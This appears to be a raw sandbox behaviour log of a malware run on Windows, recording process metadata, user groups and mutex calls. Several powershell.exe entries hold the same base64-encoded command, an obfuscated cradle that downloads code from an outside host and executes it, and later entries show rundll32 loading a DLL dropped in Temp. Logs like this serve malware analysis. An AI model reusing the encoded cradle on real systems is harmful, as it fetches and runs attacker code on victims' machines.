	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1889
	os_tid = 0x2548

	[0878.564] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1948
	os_tid = 0x265c


Thread:
	id = 1972
	os_tid = 0x26b8


Process:
	id = "273"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x27b28000"
	os_pid = "0x2564"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "37"
	os_parent_pid = "0x518"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1895
	os_tid = 0x2568

	[0882.134] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1977
	os_tid = 0x26cc


Thread:
	id = 1984
	os_tid = 0x26e8


Process:
	id = "274"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x6b314000"
	os_pid = "0x2598"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "79"
	os_parent_pid = "0xe88"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1904
	os_tid = 0x259c

	[0882.012] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1975
	os_tid = 0x26c4


Thread:
	id = 1982
	os_tid = 0x26e0


Process:
	id = "275"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x3caf2000"
	os_pid = "0x25dc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "62"
	os_parent_pid = "0xf44"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1919
	os_tid = 0x25e0

	[0883.424] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 1949
	os_tid = 0x2660


Thread:
	id = 1973
	os_tid = 0x26bc


Thread:
	id = 2151
	os_tid = 0x208c


Thread:
	id = 2153
	os_tid = 0x24a8


Process:
	id = "276"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4f4d6000"
	os_pid = "0x2730"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "76"
	os_parent_pid = "0xdd4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 2001
	os_tid = 0x2734

	[0904.606] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 2034
	os_tid = 0x27b8


Thread:
	id = 2040
	os_tid = 0x27d0


Process:
	id = "277"
	image_name = "rundll32.exe"
	filename = "c:\\windows\\system32\\rundll32.exe"
	page_root = "0x6e6af000"
	os_pid = "0x203c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "57"
	os_parent_pid = "0xf10"
	cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\vThQexNegi.dll,f0 "
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 2125
	os_tid = 0x2328


Process:
	id = "278"
	image_name = "rundll32.exe"
	filename = "c:\\windows\\syswow64\\rundll32.exe"
	page_root = "0x69163000"
	os_pid = "0x24b4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "277"
	os_parent_pid = "0x203c"
	cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\vThQexNegi.dll,f0 "
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 2144
	os_tid = 0x2498